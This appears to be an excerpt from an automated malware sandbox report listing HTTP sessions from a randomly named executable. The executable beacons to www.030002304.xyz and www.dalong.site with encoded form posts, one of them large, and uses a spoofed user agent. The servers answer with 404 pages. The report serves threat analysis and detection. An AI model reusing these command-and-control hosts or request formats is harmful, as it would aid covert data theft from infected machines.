                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.455743172.96.187.60804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:36.092660904 CET536OUTGET /s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.dalong.site
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:36.741720915 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:36 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.455744161.97.142.144804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:41.957206011 CET799OUTPOST /jkxr/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.030002304.xyz
                                                                            Origin: http://www.030002304.xyz
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.030002304.xyz/jkxr/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 71 64 78 47 72 48 44 2f 61 62 53 39 34 41 4e 73 34 70 62 45 77 52 50 6e 2f 61 39 69 58 71 61 4e 6b 38 47 6b 50 6f 64 6a 33 62 6a 58 53 32 6d 54 47 6d 5a 32 2f 36 38 43 6b 52 6d 31 51 48 36 52 74 6f 4e 72 47 46 39 73 61 33 2b 6d 64 4f 55 35 41 68 30 6e 35 68 6d 7a 45 48 4a 61 4c 55 4d 31 6a 77 41 72 59 32 39 58 42 53 4c 4d 61 4d 43 33 76 64 37 63 74 6e 49 6c 46 65 4d 7a 46 72 71 2b 79 66 67 76 4f 7a 7a 37 72 42 65 4e 77 54 54 4a 65 77 4a 4d 56 5a 4a 38 4c 38 66 39 73 4d 4f 4b 78 36 6a 6b 48 72 62 74 4d 79 49 6a 63 74 59 37 78 52 56 61 68 35 35 56 47 46 41 45 73 51 78 4e 44 67 3d 3d
                                                                            Data Ascii: zhl=qdxGrHD/abS94ANs4pbEwRPn/a9iXqaNk8GkPodj3bjXS2mTGmZ2/68CkRm1QH6RtoNrGF9sa3+mdOU5Ah0n5hmzEHJaLUM1jwArY29XBSLMaMC3vd7ctnIlFeMzFrq+yfgvOzz7rBeNwTTJewJMVZJ8L8f9sMOKx6jkHrbtMyIjctY7xRVah55VGFAEsQxNDg==
                                                                            Nov 5, 2024 15:24:42.789812088 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:42 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: W/"66cce1df-b96"
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                            Nov 5, 2024 15:24:42.789833069 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.455745161.97.142.144804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:44.715219021 CET819OUTPOST /jkxr/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.030002304.xyz
                                                                            Origin: http://www.030002304.xyz
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.030002304.xyz/jkxr/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 71 64 78 47 72 48 44 2f 61 62 53 39 35 6a 56 73 36 4b 44 45 68 78 50 67 6a 4b 39 69 59 4b 61 4a 6b 38 36 6b 50 73 4e 56 30 74 7a 58 53 57 57 54 48 69 46 32 38 36 38 43 75 78 6e 2f 50 58 36 50 74 6f 4a 53 47 48 70 73 61 33 71 6d 64 4d 4d 35 41 32 67 34 34 78 6d 39 4d 6e 4a 63 50 55 4d 31 6a 77 41 72 59 32 70 39 42 53 7a 4d 61 2f 61 33 76 38 37 64 6e 48 49 6d 56 2b 4d 7a 54 62 71 36 79 66 67 64 4f 79 75 65 72 44 32 4e 77 57 76 4a 65 68 4a 50 66 5a 4a 36 45 63 65 38 74 38 6a 39 6f 36 32 62 4f 6f 66 55 52 32 51 51 5a 72 4a 68 67 67 30 4e 7a 35 64 6d 62 43 4a 77 68 54 4d 45 59 6a 41 48 64 54 38 66 7a 77 31 6e 38 78 5a 31 73 44 76 73 66 59 45 3d
                                                                            Data Ascii: zhl=qdxGrHD/abS95jVs6KDEhxPgjK9iYKaJk86kPsNV0tzXSWWTHiF2868Cuxn/PX6PtoJSGHpsa3qmdMM5A2g44xm9MnJcPUM1jwArY2p9BSzMa/a3v87dnHImV+MzTbq6yfgdOyuerD2NwWvJehJPfZJ6Ece8t8j9o62bOofUR2QQZrJhgg0Nz5dmbCJwhTMEYjAHdT8fzw1n8xZ1sDvsfYE=
                                                                            Nov 5, 2024 15:24:45.556924105 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:45 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: W/"66cce1df-b96"
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                            Nov 5, 2024 15:24:45.557122946 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.455746161.97.142.144804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:47.309850931 CET10901OUTPOST /jkxr/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.030002304.xyz
                                                                            Origin: http://www.030002304.xyz
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.030002304.xyz/jkxr/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 71 64 78 47 72 48 44 2f 61 62 53 39 35 6a 56 73 36 4b 44 45 68 78 50 67 6a 4b 39 69 59 4b 61 4a 6b 38 36 6b 50 73 4e 56 30 74 37 58 53 6c 75 54 47 44 46 32 39 36 38 43 77 68 6e 38 50 58 37 54 74 73 6b 61 47 48 6b 62 61 78 6d 6d 63 76 45 35 56 33 67 34 78 78 6d 39 4f 6e 4a 64 4c 55 4d 61 6a 77 51 76 59 32 35 39 42 53 7a 4d 61 2b 71 33 70 74 37 64 68 48 49 6c 46 65 4d 2f 46 72 72 64 79 62 30 6e 4f 79 72 72 72 53 57 4e 77 32 66 4a 62 54 68 50 54 5a 4a 34 49 38 66 76 74 38 76 69 6f 36 72 6f 4f 72 44 79 52 78 77 51 55 65 45 37 31 45 41 54 68 36 56 67 4a 42 35 51 76 78 77 76 44 79 45 30 4f 52 31 44 74 7a 35 37 35 43 77 46 38 68 44 38 4b 63 43 75 4d 6c 57 66 32 57 34 76 56 6f 67 70 69 34 6d 65 2f 59 79 4c 6e 51 4d 52 50 52 77 47 6f 35 56 77 61 53 43 45 76 50 76 74 67 64 7a 77 55 48 32 4e 49 70 61 52 56 4b 55 52 34 30 50 70 37 2b 4f 47 31 33 49 59 74 42 78 76 44 64 31 42 54 5a 31 62 42 32 52 65 55 33 5a 75 75 6d 52 55 52 6c 44 7a 32 49 76 75 38 48 47 35 4e 61 39 6f 46 4c 32 34 64 4b 6b 34 78 73 [TRUNCATED]
                                                                            Data Ascii: zhl=qdxGrHD/abS95jVs6KDEhxPgjK9iYKaJk86kPsNV0t7XSluTGDF2968Cwhn8PX7TtskaGHkbaxmmcvE5V3g4xxm9OnJdLUMajwQvY259BSzMa+q3pt7dhHIlFeM/Frrdyb0nOyrrrSWNw2fJbThPTZJ4I8fvt8vio6roOrDyRxwQUeE71EATh6VgJB5QvxwvDyE0OR1Dtz575CwF8hD8KcCuMlWf2W4vVogpi4me/YyLnQMRPRwGo5VwaSCEvPvtgdzwUH2NIpaRVKUR40Pp7+OG13IYtBxvDd1BTZ1bB2ReU3ZuumRURlDz2Ivu8HG5Na9oFL24dKk4xsSF32GEknBWGY3IAM5EuriO5myfxqmBMxINJLhAXYdcxTiicNp0y54hYhTZt28OIeFSNZ6/mZ3LU1IuyTOdnGfBYeefI6GbUHPfLaWl7cHmSRvwn4W8kMlzKUyf5wKdz0qKfGmKsKCix4/CC44Xl+TQ+urrVYorcAkJrys9a8h7sblzk6r2Y/ooxlrm+aVJnazFvqUQYt8kuZcizy8kJz3vQAGLECtIvxI1EIJDNumGHTZadX3ny77z0bLcB6oYBF+sUni7ymwwBA3dapr/XnmAhLWXieXoU1m601OMjEXe3mMItuYDorD5/JwrKy2guqxVbnZjcHCoBBu1j5hZzw0inxeahZKFY/cO2nTvXXhuH5q1QSVXskWQz/2uTPSOzIQwbTHO5FAr8CCTfY5nspa3vuWfbPTYWsdHelscjb8yqiwqiqH+G9igxW2/ZZeF02hovCp9mvWSLkDDgk/8SuvLMQrslnKvAgno3WI2XdJfVVZOYAvvi1dagOwOQndYEytE1jrHW3cOxnb4l3XiTnR9/OhPunLYv9nxda5SmvylLbTIbPdCFRlIHymHQatiEDdLGWuStZqI5soFp8nRBSpugEs39ZXnk+FspBNgEhhtw3+1Zj+uPYAJvYX9JOJPuvjtlGTPgyGUCbyg+1fGfRQ5FZbislzg4P2I [TRUNCATED]
                                                                            Nov 5, 2024 15:24:48.166568995 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:48 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: W/"66cce1df-b96"
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                            Nov 5, 2024 15:24:48.166595936 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.455747161.97.142.144804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:49.918874025 CET538OUTGET /jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.030002304.xyz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:50.688800097 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:50 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 2966
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "66cce1df-b96"
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
